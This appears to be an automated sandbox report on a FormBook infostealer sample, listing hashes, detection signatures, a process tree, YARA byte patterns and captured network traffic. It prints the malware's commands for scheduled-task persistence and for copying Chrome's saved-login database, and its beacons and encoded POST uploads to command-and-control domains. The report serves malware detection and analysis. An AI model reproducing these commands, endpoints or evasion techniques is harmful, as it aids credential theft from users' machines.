Loading ...

Play interactive tourEdit tour

Analysis Report xxgTjC4efAMDXvr.exe

Overview

General Information

Sample Name:xxgTjC4efAMDXvr.exe
Analysis ID:299471
MD5:c112c3774a084041df7dd0e2d334a656
SHA1:3681a38228d26e40150be43b23bb4a61b55a1122
SHA256:3efb5ed25276775c95cc60b4c8227a1401f5525d629148d393f5b85c25c565ec
Tags:exeFormBook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • xxgTjC4efAMDXvr.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe' MD5: C112C3774A084041DF7DD0E2D334A656)
    • schtasks.exe (PID: 6652 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • xxgTjC4efAMDXvr.exe (PID: 6696 cmdline: {path} MD5: C112C3774A084041DF7DD0E2D334A656)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 3112 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6024 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 20 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.xxgTjC4efAMDXvr.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.xxgTjC4efAMDXvr.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a507:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.xxgTjC4efAMDXvr.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175e9:$sqlite3step: 68 34 1C 7B E1
        • 0x176fc:$sqlite3step: 68 34 1C 7B E1
        • 0x17618:$sqlite3text: 68 38 2A 90 C5
        • 0x1773d:$sqlite3text: 68 38 2A 90 C5
        • 0x1762b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17753:$sqlite3blob: 68 53 D8 7F 8C
        3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe' , ParentImage: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe, ParentProcessId: 6548, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp', ProcessId: 6652
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 3112, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 6024

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\EURYWhTdx.exeReversingLabs: Detection: 22%
          Multi AV Scanner detection for submitted fileShow sources
          Source: xxgTjC4efAMDXvr.exeReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\EURYWhTdx.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: xxgTjC4efAMDXvr.exeJoe Sandbox ML: detected
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi10_2_00756C80
          Source: global trafficHTTP traffic detected: GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=QU/cSQlyWULsyYPN7f8pVUlciIeVDbN6hq2yW5NFQQssp9aWfv8U6s5pDOfeB2nX0463 HTTP/1.1Host: www.trusted-inspections.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.hblajiche.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.hblajiche.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=SMkQ1dJlHASFxCpf/3Q/18F7mw+X92y3N7IjaU2400Q98kZWvVlmzFAE//BOXQVAl/hL HTTP/1.1Host: www.synertry.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=G2e63y+YEqJJE4Cw6H5CpBVpRFZjJJTpk/5kYvmebWk4ZKuMNVRhpz6yqptgD5pJx6df&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.thegamergang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: NETREGISTRY-AS-APNetRegistryPtyLtdAU NETREGISTRY-AS-APNetRegistryPtyLtdAU
          Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.trusted-inspections.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.trusted-inspections.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trusted-inspections.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 59 32 7a 6d 4d 33 42 57 4b 46 6e 75 6c 62 47 4d 6a 35 70 44 58 41 31 41 68 39 6d 41 4c 37 42 37 28 4e 33 68 4e 36 46 4f 57 41 51 48 70 75 47 31 64 63 42 4f 35 70 31 72 64 5f 54 4d 42 69 54 2d 71 74 69 35 57 63 6c 44 34 72 71 44 45 64 78 57 68 39 53 67 64 65 66 4c 45 66 7e 4b 66 44 49 6e 76 31 68 67 76 6d 70 71 37 4d 61 5a 69 6f 51 7a 4f 69 69 49 41 5a 44 76 57 79 74 34 71 36 4f 78 66 47 6f 4b 65 41 54 6c 70 30 4b 74 69 32 67 71 35 75 6a 6c 31 78 72 74 47 52 74 6d 44 69 69 41 38 6c 33 69 75 79 63 36 57 42 54 39 6b 31 51 71 42 56 74 32 69 52 5a 53 34 31 4a 71 46 64 76 51 52 5a 43 32 64 63 61 33 64 36 63 4f 56 36 68 6d 39 4a 34 66 37 69 4e 72 45 70 33 4f 67 54 48 53 53 59 71 4d 41 4e 28 70 42 46 5a 52 36 42 5a 47 75 4e 70 68 55 35 6f 55 4b 38 4a 2d 59 61 39 7a 79 71 66 51 47 44 53 74 4c 56 49 50 42 43 7e 49 36 2d 55 4b 6e 4b 59 62 52 6f 36 32 4c 34 4e 70 76 5f 33 2d 53 5a 38 6b 51 77 54 55 75 30 4e 38 58 63 7a 2d 48 75 6c 66 55 59 71 65 6a 44 52 72 74 33 63 72 7e 43 28 49 31 4a 59 4f 74 54 76 67 7e 79 72 41 5a 57 6e 4a 4c 55 30 62 75 56 4e 37 42 6a 71 34 63 38 77 35 4b 47 54 41 48 52 6c 77 49 66 78 50 6e 42 45 66 4e 68 63 57 75 4c 66 41 49 43 36 39 35 4b 49 51 33 76 30 6f 45 41 6c 52 38 38 68 30 4f 36 6f 74 51 54 63 61 28 4e 6c 48 6a 6b 58 49 38 44 6e 57 77 5f 36 30 38 7a 4a 4e 33 33 46 34 42 68 78 4f 6a 67 36 50 31 67 46 70 55 31 6f 54 71 54 55 52 37 79 34 6c 71 43 4e 4e 65 43 78 64 77 6a 52 4d 76 6a 4b 56 52 5a 66 75 34 6a 51 70 6e 4b 52 34 4a 62 30 4d 57 76 69 34 67 6d 64 63 42 42 57 39 53 49 5a 75 36 45 4f 54 66 70 53 57 79 71 44 35 51 4a 71 6e 62 72 44 77 49 63 4f 4c 74 65 7a 32 70 4e 4a 61 4b 51 31 76 4e 58 67 35 39 52 54 59 50 42 63 7a 35 75 63 53 33 4f 6f 2d 39 52 78 7a 6e 51 51 64 71 65 32 6f 61 74 42 74 7e 4b 6e 43 69 6a 52 6c 7e 68 4c 73 63 64 79 50 56 2d 69 44 4a 54 78 69 69 44 70 33 4d 71 6d 51 41 74 78 4f 69 45 70 32 6d 58 4c 48 36 73 4c 57 4e 6e 51 38 36 2d 6a 5a 31 33 4b 79 6f 4b 54 6c 31 41 4b 38 66 38 59 59 33 48 59 77 4a 74 47 32 62 49 39 35 6a 4c 4f 77 36 75 34 43 41 68 6b 5f 52 34 64 6e 41 33 36 49 34 51 38 6e 79 72 4a 52 61 50 7e 63 4b 6b 7a 61 66 4c 35 6c 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2d=Y2zmM3BWKFnulbGMj5pDXA1Ah9mAL7B7(N3hN6FOWAQHpuG1dcBO5p1rd_TMBiT-qti5WclD4rqDEdxWh9SgdefLEf~KfDInv1hgvmpq7MaZioQzOiiIAZDvWyt4q6OxfGoKeATlp0Kti2gq5ujl1xrtGRtmDiiA8l3iuyc6WBT9k1QqBVt2iRZS41JqFdvQRZC2dca3d6cOV6hm9J4f7iNrEp3OgTHSSYqMAN(pBFZR6BZGuNphU5oUK8J-Ya9zyqfQGDStLVIPBC~I6-UKnKYbRo62L4Npv_3-SZ8kQwTUu0N8Xcz-HulfUYqejDRrt3cr~C(I1JYOtTvg~yrAZWnJLU0buVN7Bjq4c8w5KGTAHRlwIfxPnBEfNhcWuLfAIC695KIQ3v0
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.trusted-inspections.comConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.trusted-inspections.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trusted-inspections.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 59 32 7a 6d 4d 32 4a 6b 4d 6d 4c 37 79 35 53 4e 69 70 35 4c 46 77 70 53 73 61 66 47 4e 70 42 76 79 36 6e 50 4e 2d 35 4b 65 6c 30 56 34 2d 32 31 66 61 38 47 31 70 31 71 62 5f 54 50 46 69 58 6f 30 4b 6d 69 57 64 78 35 34 71 7e 45 4e 37 39 54 6d 74 53 4e 66 2d 54 37 4d 5f 72 59 66 42 4d 53 75 57 4e 34 6b 47 56 71 28 38 43 68 37 70 41 34 4e 6a 75 4e 4f 4a 50 71 51 7a 56 68 71 4a 57 6e 65 67 6f 6f 5a 46 37 6e 34 32 57 6b 74 57 51 4f 6f 4d 44 36 77 68 28 33 4a 32 6c 31 65 56 4b 45 78 41 58 71 71 44 63 35 49 42 61 38 68 31 67 49 46 6b 35 44 73 68 70 73 34 79 55 58 4c 49 6e 4e 56 61 48 37 66 70 72 59 57 72 49 4d 49 62 68 45 32 72 52 74 67 68 55 50 50 4a 6d 4b 6b 43 72 48 43 4b 69 63 4f 4d 6d 66 43 77 70 57 79 55 63 5f 75 65 46 70 57 35 35 30 51 72 30 2d 53 71 64 72 7e 4a 7a 6d 4d 44 54 78 4e 56 49 44 5a 78 6d 38 78 61 6b 56 67 61 70 4a 59 50 66 75 44 49 67 75 71 35 28 59 57 49 45 78 57 52 44 51 6b 6c 39 74 54 73 6e 6b 65 63 35 56 58 59 71 48 6f 68 4a 30 74 33 63 4e 7e 48 53 66 30 39 49 4f 73 47 62 5f 7a 79 58 32 66 57 6e 55 49 45 6b 5a 6e 46 78 72 42 6a 43 34 64 4e 41 54 4d 31 7a 41 44 44 74 33 49 37 6c 50 6d 52 45 66 45 42 63 58 38 37 66 4a 49 48 6d 44 33 71 6b 51 6d 35 49 6d 46 6e 5a 58 78 59 67 4f 4a 4b 6f 71 47 69 63 32 75 63 4a 5f 6a 6c 53 50 38 69 50 5a 33 4d 36 31 71 43 5a 42 32 46 74 35 64 46 4d 5a 6a 67 7a 4a 31 67 4a 47 46 45 77 68 39 6d 38 53 36 30 49 6d 7a 58 6c 53 61 68 59 44 37 6a 68 5a 36 51 72 75 5a 4a 4c 53 35 44 41 49 6e 74 42 30 62 59 38 59 64 50 58 4e 70 33 4a 41 4d 56 53 4d 64 6f 31 38 6a 46 69 78 4e 35 69 4a 30 4c 37 52 53 36 47 39 61 6f 72 71 4d 66 69 63 70 4f 50 48 6c 75 39 50 50 51 35 67 49 6d 77 4d 79 68 54 4d 58 55 5a 71 38 4e 59 42 68 4e 73 62 32 77 70 68 73 44 38 54 72 39 7e 72 4c 2d 6f 4e 7a 65 4c 62 6a 6e 5a 2d 36 6b 7a 35 64 4d 58 65 66 73 36 33 4a 7a 38 57 6b 48 68 68 48 76 57 4b 48 4b 31 7a 6e 54 46 66 39 56 4c 66 31 4c 37 2d 57 45 5a 56 36 64 58 4e 72 79 48 74 6b 4f 50 52 6f 54 57 32 59 62 70 4b 6a 79 74 46 4e 4d 79 53 65 5f 52 77 6b 62 54 5a 71 2d 38 44 4f 6c 70 39 41 4c 74 34 4d 41 28 50 39 7a 52 72 6d 4a 74 34 52 76 7e 6a 46 79 48 4e 58 5f 68 71 77 5a 68 33 61 63 41 57 4c 78 68 42 52 31 66 4d 59 41 6c 38 57 34 70 46 75 57 76 4e 73 4c 28 6c 34 38 4f 76 48 69 4f 56 6e 7a 78 78 35 35 4b 66 56 38 51 57 48 39 7e 71 5a 6e 6c 67 44 33 79 67 5a 4b 31 33 6b 6a 4c 57 35 6c 4d 50 6a 75 79 54 77 6e 45 6f 35 5a 52 39 6c 71 70 64 7e 78 47 72 50 62 50 54 49 6e 44 4b 79 44 75 53 4b 54 43 52 38 70 32 45 63 61 76 33 63 5a 6d 46 46 56 4d 30 51 48 43 59 33 30 71 55 50 5f 4e 6e 4d 32 63 7a 61 4e 31 31 7
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.hblajiche.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.hblajiche.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hblajiche.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 58 6f 58 68 39 57 32 38 5a 76 67 64 58 33 44 2d 73 78 72 54 4e 4e 47 5f 54 30 35 4e 72 6d 39 6b 64 37 71 4c 38 68 65 41 55 59 63 4d 7e 4d 30 38 66 57 30 6f 74 51 64 65 67 5a 38 48 46 6f 6e 49 28 6f 68 48 7e 61 47 54 53 58 77 44 56 42 56 62 42 46 59 41 41 46 43 7a 4e 75 58 6e 47 57 52 4c 34 4e 68 58 63 67 48 4c 6c 5a 49 50 75 61 52 4f 38 64 6d 34 4b 43 4a 6b 69 6d 41 31 50 45 75 44 6a 58 30 56 6d 4a 6d 4b 4b 55 53 6d 79 70 34 45 64 32 4f 64 50 70 66 69 57 52 76 6d 42 45 6a 43 72 6a 4c 79 65 32 54 6a 34 34 7e 6c 62 39 4b 41 57 50 75 6d 79 63 50 63 6f 44 58 5f 7e 47 79 79 42 5f 76 52 56 72 68 32 52 34 74 52 41 5a 56 67 68 78 63 67 39 4b 52 56 55 47 5a 65 44 30 79 32 67 78 79 46 7a 70 63 6a 39 6d 64 6a 48 79 54 77 66 37 31 4c 4a 59 7a 66 50 6e 58 52 74 45 48 63 6b 7a 44 35 43 63 65 46 76 50 67 63 61 57 6a 31 4d 32 75 48 68 45 36 36 37 32 6f 68 46 75 61 4b 34 61 28 54 5a 71 43 4d 6f 76 63 68 47 52 4f 63 31 79 55 67 59 2d 67 6d 45 33 61 61 73 6e 4e 65 67 6d 78 35 65 36 6a 75 69 69 74 78 47 4f 55 49 71 78 44 4f 30 4f 67 77 48 6f 78 36 6c 43 67 45 65 39 37 4d 38 42 63 72 62 75 70 41 79 76 66 4e 4b 62 4f 31 57 7a 4b 57 61 68 37 76 55 6b 71 78 45 63 4a 69 38 51 75 65 52 45 37 44 46 52 49 79 58 79 31 71 64 44 6d 53 76 48 4b 6b 4a 50 6d 48 4b 48 67 6e 4a 59 4c 5f 4e 78 72 46 71 66 4f 44 57 54 6c 67 4f 66 67 69 4b 56 7e 50 51 6d 63 32 4f 45 59 4d 62 53 42 6b 52 79 36 56 56 73 45 43 61 4e 30 6e 51 31 56 55 38 6a 34 45 6d 63 52 33 6c 76 50 6c 43 4e 31 39 59 79 4e 59 32 35 53 6d 7a 52 4f 6e 72 65 48 43 34 37 42 64 72 36 32 61 67 5f 7a 61 6a 69 45 67 62 58 36 32 45 75 52 65 78 78 47 50 56 35 66 32 6d 75 45 34 52 6f 61 62 43 4b 28 79 6d 42 32 39 37 59 68 66 30 74 39 7a 41 6b 32 35 64 2d 6e 5f 66 6f 6e 73 39 78 55 31 4b 53 66 4b 4d 63 6b 57 38 54 6c 6f 51 45 4b 66 28 4f 4b 52 61 33 37 45 51 65 49 52 57 55 77 36 78 79 6f 63 4d 34 75 41 6c 48 39 6d 64 73 38 4f 6c 46 6d 73 63 57 6a 73 45 56 5a 57 32 39 6c 69 56 49 6d 74 4e 30 66 6d 77 64 54 43 46 41 64 52 52 33 5a 49 69 4d 51 70 6e 75 56 6f 51 46 38 4e 4e 64 58 4e 42 58 42 30 6f 5a 54 4d 63 76 63 62 62 30 55 64 79 73 31 50 6c 75 5a 30 54 34 68 77 6d 77 29 2e 00 6e 41 33 36 49 34 51 Data Ascii: 2d=XoXh9W28ZvgdX3D-sxrTNNG_T05Nrm9kd7qL8heAUYcM~M08fW0otQdegZ8HFonI(ohH~aGTSXwDVBVbBFYAAFCzNuXnGWRL4NhXcgHLlZIPuaRO8dm4KCJkimA1PEuDjX0VmJmKKUSmyp4Ed2OdPpfiWRvmBEjCrjLye2Tj44~lb9KAWPumycPcoDX_~GyyB_vRVrh2R4tRAZVghxcg9KRVUGZeD0y2gxyFzpcj9mdjHyTwf71LJYzfPnXRtEHckzD5CceFvPgcaWj1M2uHhE6672ohFuaK4a(TZqCMovchGROc1yUgY-gmE3aasnNegmx5e6juiitxGOUIqxDO0OgwHox6lCgEe97M8BcrbupAyvfNKbO1WzKWah7vUkqxEcJi8QueRE7DFRIyXy1qdDmSvHKkJPmHKHgnJYL_N
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.hblajiche.comConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.hblajiche.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hblajiche.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 58 6f 58 68 39 55 58 61 56 5f 30 4d 51 46 33 5f 74 68 36 51 4a 4e 33 6d 58 32 73 4a 37 45 74 33 55 4c 47 68 38 68 75 45 42 4d 5a 54 35 74 6b 38 5a 56 64 68 67 51 64 5a 69 5a 38 45 49 49 72 77 32 66 64 31 7e 59 71 35 53 58 6f 4d 50 77 46 65 42 31 5a 41 41 6c 66 41 63 64 71 37 47 55 56 2d 34 70 46 50 5a 67 62 4c 34 39 63 33 69 65 4e 38 37 63 61 72 57 43 46 68 78 7a 30 57 50 58 33 30 6a 31 4a 77 68 4e 7e 49 4e 68 53 74 39 4b 67 73 61 6b 75 53 51 74 33 6c 4b 43 54 31 4c 44 7a 4f 6c 47 6e 4d 52 58 54 67 78 73 71 72 4f 4e 37 7a 47 4f 36 